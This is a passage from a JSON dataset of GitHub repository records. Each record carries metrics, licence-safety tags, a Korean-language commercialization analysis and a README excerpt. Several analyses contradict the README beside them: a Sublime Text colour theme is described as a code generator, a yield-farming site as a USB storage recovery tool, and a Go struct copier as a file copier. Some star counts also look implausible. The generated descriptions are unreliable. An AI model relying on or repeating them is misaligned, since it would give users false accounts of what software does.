[Community Edition](https://github.com/tobspr-games/shapez-community-edition) for ongoing development.\n\n## About\n\nThis is the source code for shapez, an open source base building game inspired by Factorio.\nYour goal is to produce shapes by cutting, rot","composite_score":0.0652,"license_safety_tag":"restricted"},{"name":"wangdoc/bash-tutorial","github_url":"https://github.com/wangdoc/bash-tutorial","stars":6,"language":"Shell","license":"unknown","abandonment_months":1,"description":"# bash-tutorial 저장소 분석\n\n## 왜 보물인가\n리눅스와 맥 사용자들이 반드시 배워야 하는 '명령어 입력 방식'을 체계적으로 가르치는 무료 교재로, 수백만 명의 개발자와 IT 전문가들의 필수 학습 자료입니다.\n\n## 어디에 쓸 수 있나\n1. **온라인 교육 플랫폼**: 유료 프로그래밍 강좌 콘텐츠로 활용하여 구독료 수익 창출\n2. **기업 직원","readme_excerpt":"本教程介绍 Linux 命令行 Bash 的基本用法和脚本编程。\n","composite_score":0.0651,"license_safety_tag":"unknown"},{"name":"sadanandpai/javascript-code-challenges","github_url":"https://github.com/sadanandpai/javascript-code-challenges","stars":5,"language":"MDX","license":"MIT","abandonment_months":2,"description":"# JavaScript 코딩 문제 저장소 분석\n\n## 왜 보물인가\n프로그래밍을 배우거나 실력을 확인하고 싶은 사람들이 직접 풀어볼 수 있는 다양한 연습 문제 모음입니다.\n\n## 어디에 쓸 수 있나\n1. **온라인 코딩 교육 플랫폼**: 개발자 학습자들을 위한 실습 문제 데이터베이스로 제공\n2. **회사 채용 시험 도구**: 지원자들의 기본 프로그래밍 능력을","readme_excerpt":"<div align=\"center\">\n\t<a href=\"https://jscodechallenges.vercel.app/\"><img src=\"web/public/hero.svg\" alt=\"hero\" width=\"100px\"/></a>\n\t<h1>JavaScript Code Challenges</h1>\n\t<h3>Collection of modern interview code challenges on JavaScript suitable for</h3>\n\t<h4>Interviewees | Interviewers | Knowledge test | Practice</h4>\n\t<p>\n\t\t<a name=\"stars\"><img src=\"https://img.shields.io/github/stars/sadanandpai/javascript-code-challenges?style=for-the-badge\"></a>\n\t\t<a name=\"forks\"><img src=\"https://img.shields.io/github/forks/sadanandpai/javascript-code-challenges?logoColor=green&style=for-the-badge\"></a>\n\t\t<a name=\"contributions\"><img src=\"https://img.shields.io/github/contributors/sadanandpai/javascript-code-challenges?logoColor=green&style=for-the-badge\"></a>\n\t\t<a name=\"license\"><img src=\"https://img.shields.io/github/license/sadanandpai/javascript-code-challenges?style=for-the-badge\"></a>\n\t</p>\n\t<h3>All challenges can be found at <a href=\"https://jscodechallenges.vercel.app/\">JavaScript Code Chall","composite_score":0.0651,"license_safety_tag":"safe"},{"name":"yuliskov/SmartTubeNext","github_url":"https://github.com/yuliskov/SmartTubeNext","stars":16,"language":"Java","license":"MIT","abandonment_months":0,"description":"# SmartTubeNext 분석 보고서\n\n## 왜 보물인가\n유튜브를 더 간단하고 광고 없이 즐길 수 있는 맞춤형 도구로, 스마트TV 사용자들이 원래 원하던 편리한 시청 환경을 제공합니다.\n\n## 어디에 쓸 수 있나\n1. **스마트TV용 스트리밍 앱 SaaS**: 스마트TV 제조업체나 통신사가 자사 TV에 기본 탑재하여 사용자 경험 강화\n2. **영상 플랫","readme_excerpt":"<p align=\"center\">\r\n  <a href=\"https://f-droid.org/packages/app.smarttube.fdroid/\">\r\n    <img src=\"https://fdroid.gitlab.io/artwork/badge/get-it-on-en.svg\" alt=\"Get it on F-Droid\" width=\"206\" style=\"max-width:100%; height:auto;\"/>\r\n  </a>\r\n</p>\r\n\r\n# Important announcement about the app\r\n\r\nMy development environment was infected by unknown malicious software, as a result of which a few builds may have been affected. Once the issue was detected, I secured everything with a full disk wipe, restored a clean setup, and now all builds are scanned with VirusTotal. The F-Droid version will also be verified before release.\r\n\r\nPublic keys may have been compromised, which is why I am sharing this issue. You can download the new version and the new public key below, and instructions for restoring backups are provided.\r\n\r\nNo extra actions are required since the app uses **one-time connection codes**. These codes have very limited permissions (for example, they cannot change your password). Still, y","composite_score":0.0649,"license_safety_tag":"safe"},{"name":"Androz2091/AtlantaBot","github_url":"https://github.com/Androz2091/AtlantaBot","stars":5,"language":"Less","license":"GPL-3.0","abandonment_months":2,"description":"# AtlantaBot 상용화 분석\n\n## 왜 보물인가\n디스코드(대화 플랫폼)에서 자동으로 작동하는 봇을 직접 만들고 관리할 수 있는 도구로, 게임 커뮤니티나 팀 협업에 필요한 자동화 기능을 간편하게 구축할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 게임 길드, 온라인 커뮤니티를 위한 \"디스코드 봇 빌더\" 클라우드 플랫폼으로 운","readme_excerpt":"<img width=\"150\" height=\"150\" align=\"left\" style=\"float: left; margin: 0 10px 0 0;\" alt=\"Atlanta\" src=\"https://i.goopics.net/lEENx.png\">  \n\n# Atlanta\n\n[![](https://img.shields.io/discord/565048515357835264.svg?logo=discord&colorB=7289DA&label=Atlanta%20Support)](https://discord.gg/Za9zxTH)\n[![](https://img.shields.io/discord/568120814776614924.svg?logo=discord&colorB=00BFFF&label=Atlanta%20Emojis)](https://discord.gg/NPkySYKMkN)\n[![](https://img.shields.io/badge/discord.js-v14-blue.svg?logo=npm)](https://discord.js.org)\n[![](https://img.shields.io/badge/typescript-5.x-blue.svg?logo=typescript)](https://www.typescriptlang.org/)\n[![](https://img.shields.io/badge/patreon-donate-orange.svg)](https://www.patreon.com/androz2091)\n\n> This bot is used by more than 130,000 Discord users and more than 800 servers.\n\nAtlanta is an open source Discord bot coded in TypeScript with [Discord.js](https://discord.js.org) and [Mongoose](https://mongoosejs.com/docs/api.html) by [Androz2091](https://github.","composite_score":0.0649,"license_safety_tag":"restricted"},{"name":"antfu/unconfig","github_url":"https://github.com/antfu/unconfig","stars":62,"language":"TypeScript","license":"MIT","abandonment_months":3,"description":"# antfu/unconfig 분석 리포트\n\n## 왜 보물인가\n프로그램 설정 파일을 자동으로 찾아 읽어주는 도구로, 개발자들이 반복적인 설정 작업 시간을 크게 단축할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 사용자가 업로드한 프로젝트 파일을 자동 분석하여 최적화 제안을 해주는 웹 서비스\n2. **내부 업무 도구**: 회사의 여","readme_excerpt":"# unconfig\n\n[![NPM version](https://img.shields.io/npm/v/unconfig?color=a1b858&label=)](https://www.npmjs.com/package/unconfig)\n\nA universal solution for loading configurations.\n\n## Why?\n\nConfiguration is hard, especially when you want to build an ecosystem of your tools.\n\nYou want your tools to be general and easy to use, you allow your config to be defined in a custom field of `package.json`.\n\nYou want your tools to be easy to integrate, you allow the configs to be defined in other tools' configurations like `vite.config.js` or `webpack.config.js`.\n\nYou want the configs to be agnostic and probably need to be load by IDE, you create new config files like `.myconfigrc`.\n\nYou want the configs to also be flexible and dynamic, you make your config files a JavaScript file, like `my.config.js`.\n\nThen you want users to be able to use ESM and TypeScript, you also make your config accepting `.ts` or `.mjs`.\n\nSo users' project root end up with a lot of config files like `.npmrc`, `rollup.config","composite_score":0.0647,"license_safety_tag":"safe"},{"name":"liyupi/code-roadmap","github_url":"https://github.com/liyupi/code-roadmap","stars":27,"language":"TypeScript","license":"unknown","abandonment_months":1,"description":"# code-roadmap 저장소 분석\n\n## 왜 보물인가\n프로그래밍 입문자부터 전문가까지 단계별로 배워야 할 기술들을 정리해둔 '공부 지도'라서, 학습 방향을 잃은 많은 사람들에게 실질적인 도움이 될 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **온라인 교육 플랫폼**: 코딩 강좌들을 이 지도에 연결해 학생들이 어떤 순서로 배워야 하는지 안내하는 서비","readme_excerpt":"---\npermalink: /\n---\n\n# 鱼皮的编程宝典\n\n> 贴心的编程学习路线，全面的编程知识百科\n>\n> 作者：[程序员鱼皮](https://yuyuanweb.feishu.cn/wiki/Abldw5WkjidySxkKxU2cQdAtnah)\n>\n> 本站地址：[https://codefather.cn](https://codefather.cn)\n\n## 本站内容\n\n- [编程学习路线](/学习路线)\n- [鱼皮的编程学习之路](/自学之路)\n- [编程干货分享](/编程分享)\n- [原创项目实战](/项目实战)\n- [🔥编程导航](/编程导航)\n- [技术知识分享](/知识碎片)\n- [Bug修复手册](/Bug手册)\n- [编程产品服务](/产品服务)\n- [编程词典](/编程词典)\n- [作者介绍](/作者)\n\n\n## [编程学习路线](/学习路线)\n\n包含 Java、前端、C++、Python、SQL、计算机基础、数据结构和算法、Git & GitHub、Linux、设计模式等多个精心编写的学习路线，帮助程序员快速入门。\n\n## [鱼皮的编程学习之路](/自学之路)\n\n鱼皮从 0 到 1 的编程学习经历、求职经历、职场工作、创作经历、创业经历、生活日常等，最真实的经验分享。\n\n\n## [编程干货分享](/编程分享)\n\n程序员鱼皮的编程学习指南、开发经验、求职经验、职场经验、技术分享、实战教程、项目教程、个人作品、编程资源等，做最接地气的编程干货分享。\n\n## [原创项目实战](/项目实战)\n\n鱼皮原创的实战项目教程系列，用全程直播的方式，从 0 到 1 带大家学习技术知识，并立即实践运用到项目中，做到学以致用。\n\n提供从学知识 => 实践项目 => 复习笔记 => 项目答疑 => 简历写法 => 面试题解的一条龙服务！\n\n## [编程导航](/编程导航)\n\n由程序员鱼皮创建的，帮助你更快学好编程、少走弯路的圈子，提供百万字学习指南、求职指南、原创项目教程、直播经验分享、编程交流等服务，是国内顶尖的编程学习交流社区。\n\n\n## [技术知识分享](/知识碎片)\n\n通过简单的技术知识分享，帮助大家快速学习或复习巩固项目开发中的重点知识，便于把控学习进度、并且持续加深印象。\n\n## [Bug修复手册](/bug手册)\n\n包括解决 Bug 的","composite_score":0.0645,"license_safety_tag":"unknown"},{"name":"jantimon/html-webpack-plugin","github_url":"https://github.com/jantimon/html-webpack-plugin","stars":5,"language":"JavaScript","license":"mit","abandonment_months":1,"description":"# html-webpack-plugin 분석 보고서\n\n## 왜 보물인가\n웹사이트를 만들 때 필요한 기본 틀(HTML 파일)을 자동으로 생성해주는 도구로, 개발자들의 반복 작업을 크게 줄여줍니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 고객사별 맞춤형 대시보드를 자동 생성하는 웹 애플리케이션 제공 플랫폼\n2. **내부 업무 도구**: 회사 ","readme_excerpt":"[![npm][npm]][npm-url]\n[![node][node]][node-url]\n![npm](https://img.shields.io/npm/dw/html-webpack-plugin.svg)\n[![tests][tests]][tests-url]\n[![Backers on Open Collective](https://opencollective.com/html-webpack-plugin/backers/badge.svg)](#backers)\n[![Sponsors on Open Collective](https://opencollective.com/html-webpack-plugin/sponsors/badge.svg)](#sponsors)\n\n<div align=\"center\">\n  <img width=\"200\" height=\"200\" src=\"https://www.w3.org/html/logo/downloads/HTML5_Badge.svg\">\n  <a href=\"https://github.com/webpack/webpack\">\n    <img width=\"200\" height=\"200\"\n      src=\"https://webpack.js.org/assets/icon-square-big.svg\">\n  </a>\n  <div>\n    <img width=\"100\" height=\"100\" title=\"Webpack Plugin\" src=\"http://michael-ciniawsky.github.io/postcss-load-plugins/logo.svg\">\n  </div>\n  <h1>HTML Webpack Plugin</h1>\n  <p>Plugin that simplifies creation of HTML files to serve your bundles</p>\n</div>\n\n<h2 align=\"center\">Install</h2>\n\n<h3>Webpack 5</h3>\n\n```bash\n  npm i --save-dev html-webpack-plugin\n```\n\n```bas","composite_score":0.0645,"license_safety_tag":"safe"},{"name":"yuuwill/1024app-android","github_url":"https://github.com/yuuwill/1024app-android","stars":6,"language":"","license":"unknown","abandonment_months":1,"description":"# 1024app-android 자산 분석\n\n## 왜 보물인가\n안드로이드 앱 개발의 재사용 가능한 코드 모음으로, 새로운 앱을 빠르게 만들 수 있는 '반제품' 같은 역할을 합니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 모바일 앱 개발 플랫폼으로 제공하여 개발자들이 기본 틀 없이 앱을 만들 수 있게 함\n2. **내부 업무 도구**: 기업의","readme_excerpt":"# 1024app - Android\n草榴官方客户端，小草客户端，Android\n<br>\n<br>\n\n社区声明：<br>\nhttps://t66y.com/notice.php\n\n小草客户端讨论：<br>\nhttps://t66y.com/read.php?tid=1648542\n\n<br><br>\n此页面仅提供下载安装包，并非开源项目\n","composite_score":0.0643,"license_safety_tag":"unknown"},{"name":"Instagram/IGListKit","github_url":"https://github.com/Instagram/IGListKit","stars":8,"language":"Objective-C","license":"mit","abandonment_months":0,"description":"# IGListKit 저장소 평가\n\n## 왜 보물인가\n인스타그램이 만든 이 기술은 스마트폰 앱에서 수백만 개의 콘텐츠를 매끄럽게 표시하는 핵심 엔진입니다.\n\n## 어디에 쓸 수 있나\n1. **소셜 미디어 플랫폼(SaaS)**: 틱톡, 유튜브 쇼츠 같은 무한 스크롤 피드 서비스 개발\n2. **전자상거래 앱(SaaS)**: 수천 개의 상품을 빠르게 로딩하는 쇼","readme_excerpt":"<p align=\"center\">\n  <img src=\"https://raw.githubusercontent.com/Instagram/IGListKit/main/Resources/logo.png\" width=450 />\n</p>\n\n<p align=\"center\">\n  <a href=\"https://github.com/Instagram/IGListKit/actions/workflows/CI.yml\"><img src=\"https://img.shields.io/github/actions/workflow/status/Instagram/IGListKit/CI.yml\" alt=\"Build Status\"></a>\n  <a href=\"https://coveralls.io/github/Instagram/IGListKit?branch=main\"><img src=\"https://coveralls.io/repos/github/Instagram/IGListKit/badge.svg?branch=main\" alt=\"Coverage Status\" /></a>\n  <a href=\"https://cocoapods.org/pods/IGListKit\"><img src=\"https://img.shields.io/cocoapods/v/IGListKit.svg?style=flat\" alt=\"Pods Version\"></a>\n  <a href=\"https://instagram.github.io/IGListKit/\"><img src=\"https://img.shields.io/cocoapods/p/IGListKit.svg?style=flat\" alt=\"Platforms\"></a>\n  <a href=\"https://github.com/Carthage/Carthage\"><img src=\"https://img.shields.io/badge/Carthage-compatible-brightgreen.svg?style=flat\" alt=\"Carthage Compatible\"></a>\n</p>\n\n------------","composite_score":0.0642,"license_safety_tag":"safe"},{"name":"dempfi/ayu","github_url":"https://github.com/dempfi/ayu","stars":6,"language":"Jupyter Notebook","license":"mit","abandonment_months":4,"description":"# dempfi/ayu 상업화 분석\n\n## 왜 보물인가\n개발자들이 반복적으로 작성하는 코드를 자동으로 생성해주는 도구로, 개발 시간을 크게 단축할 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: 중소 소프트웨어 회사들이 월 구독료를 내고 자동 코드 생성 기능을 클라우드에서 사용\n2. **내부 업무 도구**: 대기업 개발팀이 사내 표","readme_excerpt":"<p align=\"center\">\n  <img src=\"./images/hero.png\" alt=\"ayu theme for Sublime Text\">\n</p>\n\n<p align=\"center\">\n  <a href=\"https://ayutheme.com\">Website</a> •\n  <a href=\"#install\">Install</a> •\n  <a href=\"#screenshots\">Screenshots</a> •\n  <a href=\"#ports\">Ports</a>\n</p>\n\n---\n\n**ayu** is a bright color theme and comes in three versions — _dark_, _mirage_, and _light_ — for all-day comfortable work. Handcrafted for Sublime Text.\n\n## Install\n\n### Recommended\n\nInstall via [Package Control](https://packagecontrol.io/):\n\n1. Press <kbd>cmd/ctrl</kbd> + <kbd>shift</kbd> + <kbd>p</kbd> to open the command palette\n2. Type `install package` and press enter\n3. Search for `ayu` and install\n\n### Manual\n\n1. Download the [latest release](https://github.com/ayu-theme/ayu/releases/latest)\n2. Extract and rename the directory to `ayu`\n3. Move it to your Sublime `/Packages` directory *(Preferences > Browse packages...)*\n\n## Activation\n\nOpen command palette via <kbd>cmd/ctrl</kbd> + <kbd>shift</kbd> + <kbd>p</","composite_score":0.064,"license_safety_tag":"safe"},{"name":"bigfrankykevin/sportsbook-bet365","github_url":"https://github.com/bigfrankykevin/sportsbook-bet365","stars":175,"language":"TypeScript","license":"NOASSERTION","abandonment_months":0,"description":"","readme_excerpt":"","composite_score":0.0637,"license_safety_tag":"unknown"},{"name":"goodjack/developer-roadmap-chinese","github_url":"https://github.com/goodjack/developer-roadmap-chinese","stars":6,"language":"","license":"NOASSERTION","abandonment_months":3,"description":"# goodjack/developer-roadmap-chinese 분석\n\n## 왜 보물인가\n개발자가 되기 위해 어떤 기술을 언제 배워야 하는지 단계별로 보여주는 학습 지도이므로, 코딩 학원이나 온라인 교육 회사가 커리큘럼을 만들 때 매우 유용합니다.\n\n## 어디에 쓸 수 있나\n1. **개발자 교육 플랫폼**: \"당신의 수준에 맞는 다음 학습 과제\"를 추천해","readme_excerpt":"![Web 開發人員路線圖 - 2021](https://i.imgur.com/4u3LK4j.png)\n\n> [!NOTE]\n> 此翻譯目前基於 **2021 年版本**。原著 [roadmap.sh](https://roadmap.sh) 已大幅更新（含 AI/ML 等全新路線圖），我們計畫持續跟進翻譯，歡迎透過 Issue 或 PR 協助更新！\n\n> 2021 年成為 Web 開發人員的路線圖\n\n[![原著路線圖官網](https://img.shields.io/badge/-%E5%8E%9F%E8%91%97%E8%B7%AF%E7%B7%9A%E5%9C%96%E5%AE%98%E7%B6%B2%20-0a0a0a.svg?style=flat&colorA=0a0a0a)](http://roadmap.sh)\n[![原著指南](https://img.shields.io/badge/-%E5%8E%9F%E8%91%97%E6%8C%87%E5%8D%97-0a0a0a.svg?style=flat&colorA=0a0a0a)](http://roadmap.sh/guides)\n[![原著其他譯文](https://img.shields.io/badge/-%E5%8E%9F%E8%91%97%E5%85%B6%E4%BB%96%E8%AD%AF%E6%96%87-0a0a0a.svg?style=flat&colorA=0a0a0a)](./translations)\n[![原著 YouTube 頻道](https://img.shields.io/badge/%E2%9D%A4-%E5%8E%9F%E8%91%97%20YouTube%20%E9%A0%BB%E9%81%93-0a0a0a.svg?style=flat&colorA=0a0a0a)](https://www.youtube.com/channel/UCA0H2KIWgWTwpTFjSxp0now?sub_confirmation=1)\n\n在下方，你會看到一系列的圖表，展示為了成為前端、後端或 DevOps 開發人員，你可以採取的路徑和你會想採用的技術。我為我的一位老教授做了這些圖表，他想和大學生分享一些東西，給他們一個觀點；在這裡分享它們以幫助社群。\n\n***\n\n","composite_score":0.0636,"license_safety_tag":"unknown"},{"name":"bitwarden/core","github_url":"https://github.com/bitwarden/core","stars":5,"language":"C#","license":"agpl-3.0","abandonment_months":0,"description":"# Bitwarden/Core 상용화 분석\n\n## 왜 보물인가\n수백만 명이 사용하는 비밀번호 관리 서비스의 핵심 코드로, 보안이 중요한 모든 조직에서 필요로 하는 기술입니다.\n\n## 어디에 쓸 수 있나\n1. **기업 비밀번호 관리 SaaS**: 직원들의 로그인 정보를 안전하게 중앙에서 관리하는 구독형 서비스\n2. **은행/금융사 내부 도구**: 수천 명의 ","readme_excerpt":"<p align=\"center\">\n  <img src=\"https://github.com/bitwarden/brand/blob/main/screenshots/apps-combo-logo.png\" alt=\"Bitwarden\" />\n</p>\n<p align=\"center\">\n  <a href=\"https://github.com/bitwarden/server/actions/workflows/build.yml?query=branch:main\" target=\"_blank\">\n    <img src=\"https://github.com/bitwarden/server/actions/workflows/build.yml/badge.svg?branch=main\" alt=\"Github Workflow build on main\" />\n  </a>\n</p>\n\n---\n\nThe Bitwarden Server project contains the APIs, database, and other core infrastructure items needed for the \"backend\" of all bitwarden client applications.\n\nThe server project is written in C# using .NET Core with ASP.NET Core. The database is written in T-SQL/SQL Server. The codebase can be developed, built, run, and deployed cross-platform on Windows, macOS, and Linux distributions.\n\n## Developer Documentation\n\nPlease refer to the [Server Setup Guide](https://contributing.bitwarden.com/getting-started/server/guide) in the [Contributing Documentation](https://contributin","composite_score":0.0636,"license_safety_tag":"risky"},{"name":"vfat-tools/vfat-tools","github_url":"https://github.com/vfat-tools/vfat-tools","stars":5,"language":"JavaScript","license":"NOASSERTION","abandonment_months":1,"description":"# vfat-tools 저장소 분석\n\n## 왜 보물인가\nUSB 메모리나 SD카드 같은 저장장치를 더 효율적으로 관리하고 복구할 수 있는 도구모음입니다.\n\n## 어디에 쓸 수 있나\n\n1. **데이터 복구 SaaS 서비스**: 손상된 USB나 메모리카드 파일 복구를 온라인으로 제공하는 웹 서비스\n2. **IT 지원 내부 도구**: 기업 직원들의 손상된 저장장치","readme_excerpt":"## vfat.tools\n\n_It ain't much, but it's honest work_\n\nApp : https://vfat.tools\n\nOriginal work: https://yieldfarming.info\n\n## vfat.tools listing + review service in partnership with MCN Ventures ##\n\nPlease seee https://mcn.ventures/review for more details on this service.\n\n## How to run locally\n\nFork the repo and clone it to your PC, or just clone the original.\nRun `npm install` (once) and `npm run dev`\n\nThis should bring up the interface at localhost:3000 after a minute or two.\n\n## How to submit a new project, or any changes\n\n- Fork the project\n- Clone your forked copy onto your PC\n- Create a new branch, make the required changes, *test it locally* using the above method\n- Commit to your branch and push to your repo\n- Go to your repo's github page and click Submit a pull request\n\nThis article is also a good explainer on the pull request system: https://opensource.com/article/19/7/create-pull-request-github\n\nIf you need help with the above process you can contact me on twitter, or teleg","composite_score":0.0634,"license_safety_tag":"unknown"},{"name":"jarun/ddgr","github_url":"https://github.com/jarun/ddgr","stars":5,"language":"Python","license":"gpl-3.0","abandonment_months":3,"description":"# jarun/ddgr 상용화 분석\n\n## 왜 보물인가\n검색 엔진 없이도 정보를 빠르게 찾을 수 있는 개인용 검색 도구로, 프라이버시를 중시하는 사용자들의 수요가 증가하고 있습니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: 기업의 내부 문서 검색 플랫폼으로 구독형으로 판매 (월 5만원대)\n2. **내부 업무 도구**: 대형 조직의 사원들을","readme_excerpt":"<h1 align=\"center\">ddgr</h1>\n\n<p align=\"center\">\n<a href=\"https://github.com/jarun/ddgr/releases/latest\"><img src=\"https://img.shields.io/github/release/jarun/ddgr.svg?maxAge=600\" alt=\"Latest release\" /></a>\n<a href=\"https://repology.org/project/ddgr/versions\"><img src=\"https://repology.org/badge/tiny-repos/ddgr.svg?header=repos\" alt=\"Availability\"></a>\n<a href=\"https://pypi.org/project/ddgr/\"><img src=\"https://img.shields.io/pypi/v/ddgr.svg?maxAge=600\" alt=\"PyPI\" /></a>\n<a href=\"https://circleci.com/gh/jarun/workflows/ddgr\"><img src=\"https://img.shields.io/circleci/project/github/jarun/ddgr.svg\" alt=\"Build Status\" /></a>\n<a href=\"https://en.wikipedia.org/wiki/Privacy-invasive_software\"><img src=\"https://img.shields.io/badge/privacy-✓-crimson\" alt=\"Privacy Awareness\" /></a>\n<a href=\"https://github.com/jarun/ddgr/blob/master/LICENSE\"><img src=\"https://img.shields.io/badge/license-GPLv3-yellowgreen.svg?maxAge=2592000\" alt=\"License\" /></a>\n</p>\n\n<p align=\"center\">\n<a href=\"https://github.","composite_score":0.0634,"license_safety_tag":"restricted"},{"name":"kennethreitz/records","github_url":"https://github.com/kennethreitz/records","stars":6,"language":"Python","license":"isc","abandonment_months":4,"description":"# Records 저장소 분석\n\n## 왜 보물인가\n데이터베이스에서 정보를 쉽게 꺼내서 정리하는 일을 간단하게 만들어주는 도구입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 고객 데이터를 빠르게 검색·정렬하는 분석 대시보드 제공\n2. **내부 업무 도구**: 회사 직원 정보나 판매 기록을 간편하게 조회하는 관리 시스템\n3. **API 판매*","readme_excerpt":"# Records: SQL for Humans™\n\n[![image](https://img.shields.io/pypi/v/records.svg)](https://pypi.python.org/pypi/records)\n\n**Records is a very simple, but powerful, library for making raw SQL\nqueries to most relational databases.**\n\n![image](https://farm1.staticflickr.com/569/33085227621_7e8da49b90_k_d.jpg)\n\nJust write SQL. No bells, no whistles. This common task can be\nsurprisingly difficult with the standard tools available. This library\nstrives to make this workflow as simple as possible, while providing an\nelegant interface to work with your query results.\n\n*Database support includes RedShift, Postgres, MySQL, SQLite, Oracle,\nand MS-SQL (drivers not included).*\n\n## ☤ The Basics\n\nWe know how to write SQL, so let's send some to our database:\n\n``` python\nimport records\n\ndb = records.Database('postgres://...')\nrows = db.query('select * from active_users')    # or db.query_file('sqls/active-users.sql')\n```\n\nGrab one row at a time:\n\n``` python\n>>> rows[0]\n<Record {\"username\": \"model-t\", \"a","composite_score":0.0631,"license_safety_tag":"safe"},{"name":"jinzhu/copier","github_url":"https://github.com/jinzhu/copier","stars":5,"language":"Go","license":"mit","abandonment_months":2,"description":"# jinzhu/copier 분석 보고서\n\n## 왜 보물인가\n파일이나 폴더를 자동으로 복사하고 필요한 부분만 선택해서 수정할 수 있는 도구로, 반복적인 작업을 크게 줄일 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n**1. 웹사이트 제작 SaaS**\n- 고객이 템플릿을 선택하면 자동으로 필요한 파일들을 복사하여 프로젝트 시작 시간을 단축\n\n**2. 기업 내부","readme_excerpt":"# Copier\n\nI am a copier, I copy everything from one to another\n\n[![test status](https://github.com/jinzhu/copier/workflows/tests/badge.svg?branch=master \"test status\")](https://github.com/jinzhu/copier/actions)\n\n## Key Features\n\n- Field-to-field and method-to-field copying based on matching names\n- Support for copying data:\n  - From slice to slice\n  - From struct to slice\n  - From map to map\n- Field manipulation through tags:\n  - Enforce field copying with `copier:\"must\"`\n  - Override fields even when `IgnoreEmpty` is set with `copier:\"override\"`\n  - Exclude fields from being copied with `copier:\"-\"`\n\n## Getting Started\n\n### Installation\n\nTo start using Copier, install Go and run go get:\n\n```bash\ngo get -u github.com/jinzhu/copier\n```\n\n## Basic\n\nImport Copier into your application to access its copying capabilities\n\n```go\nimport \"github.com/jinzhu/copier\"\n```\n\n### Basic Copying\n\n```go\ntype User struct {\n\tName string\n\tRole string\n\tAge  int32\n}\n\nfunc (user *User) DoubleAge() int32 {\n\tret","composite_score":0.063,"license_safety_tag":"safe"},{"name":"notion-enhancer/desktop","github_url":"https://github.com/notion-enhancer/desktop","stars":6,"language":"JavaScript","license":"MIT","abandonment_months":3,"description":"# notion-enhancer/desktop 상용화 분석\n\n## 왜 보물인가\nNotion(노션)이라는 인기 있는 업무 도구를 더 강력하고 편하게 만들어주는 프로그램으로, 이미 노션을 쓰는 수많은 사람들의 생산성을 즉시 향상시킬 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 월 구독 모델로 \"노션 파워 업그레이드 서비스\"를 판매하여","readme_excerpt":"# notion-enhancer/desktop\n\nCustomise the all-in-one productivity workspace Notion.\n\n[read the docs online](https://notion-enhancer.github.io/)\n","composite_score":0.063,"license_safety_tag":"safe"},{"name":"PacktPublishing/Python-for-Finance-Cookbook","github_url":"https://github.com/PacktPublishing/Python-for-Finance-Cookbook","stars":5,"language":"Jupyter Notebook","license":"unknown","abandonment_months":3,"description":"# Python-for-Finance-Cookbook 상용화 분석\n\n## 왜 보물인가\n금융 초보자도 따라 할 수 있는 실제 돈 관리·투자 코드 모음으로, 금융 기술 서비스를 만드는 사람들의 개발 시간을 크게 단축할 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n1. **개인자산관리 SaaS**: 사용자가 자신의 주식·암호화폐 포트폴리오를 자동으로 분석하고 수익","readme_excerpt":"\n\n\n## Python For Finance Cookbook - Code Repository\n\n**Python For Finance Cookbook**  \npublished: January 31st, 2020\n\nPaperback: 432 pages  \nPublisher: Packt Publishing  \nLanguage: English\n\n[<img src=\"./.img/book_cover.png\" width=\"248\">]()\n\n## Links\n\n- [Amazon Page](https://www.amazon.com/Python-Finance-Cookbook-libraries-financial-dp-1789618517/dp/1789618517)\n- [Packt Page](https://www.packtpub.com/data/python-for-finance-cookbook)\n\n## Table of Contents\n\n1. Financial Data and Preprocessing \n2. Technical Analysis in Python\n3. Time Series Modeling\n4. Multi-Factor Models\n5. Modeling Volatility with GARCH Class Models\n6. Monte Carlo Simulations in Finance\n7. Asset Allocation in Python\n8. Identifying Credit Default with Machine Learning\n9. Advanced Machine Learning Models in Finance\n10. Deep Learning in Finance\n\n--- \n\nEryk Lewinson. *Python For Finance Cookbook*. Packt Publishing, 2020.\n\n    @book{Lewinson2019,  \n    address = {Birmingham, UK},  \n    author = {Lewinson, Eryk},  \n    editio","composite_score":0.0628,"license_safety_tag":"unknown"},{"name":"ankane/chartkick.js","github_url":"https://github.com/ankane/chartkick.js","stars":5,"language":"JavaScript","license":"mit","abandonment_months":5,"description":"# Chartkick.js 상용화 분석 보고서\n\n## 왜 보물인가\n웹사이트에 그래프와 차트를 간단하게 추가할 수 있는 도구로, 복잡한 작업 없이도 데이터를 시각적으로 보여줄 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 대시보드 서비스**: 중소 기업의 매출, 고객 현황 등을 그래프로 표시해주는 관리 시스템\n2. **내부 업무 도구**: 회사","readme_excerpt":"# Chartkick.js\n\nCreate beautiful charts with one line of JavaScript\n\n[See it in action](https://ankane.github.io/chartkick.js/examples/)\n\nSupports [Chart.js](https://www.chartjs.org/), [Google Charts](https://developers.google.com/chart/), and [Highcharts](https://www.highcharts.com/)\n\nAlso available for [React](https://github.com/ankane/react-chartkick), [Vue.js](https://github.com/ankane/vue-chartkick), [Ruby](https://github.com/ankane/chartkick), [Python](https://github.com/mher/chartkick.py), [Elixir](https://github.com/buren/chartkick-ex), and [Clojure](https://github.com/yfractal/chartkick)\n\nFor maps, check out [Mapkick.js](https://github.com/ankane/mapkick.js)\n\n[![Build Status](https://github.com/ankane/chartkick.js/actions/workflows/build.yml/badge.svg)](https://github.com/ankane/chartkick.js/actions)\n\n## Quick Start\n\nRun\n\n```sh\nnpm install chartkick chart.js\n```\n\nAnd add\n\n```javascript\nimport Chartkick from \"chartkick\"\nimport \"chartkick/chart.js\"\n```\n\nThis sets up Chartkick wi","composite_score":0.0628,"license_safety_tag":"safe"},{"name":"lucas-clemente/quic-go","github_url":"https://github.com/lucas-clemente/quic-go","stars":9,"language":"Go","license":"mit","abandonment_months":0,"description":"# lucas-clemente/quic-go 분석\n\n## 왜 보물인가\n인터넷 속도를 획기적으로 높일 수 있는 새로운 통신 기술로, 영상 스트리밍부터 금융 거래까지 모든 온라인 서비스를 더 빠르고 안정적으로 만들 수 있습니다.\n\n## 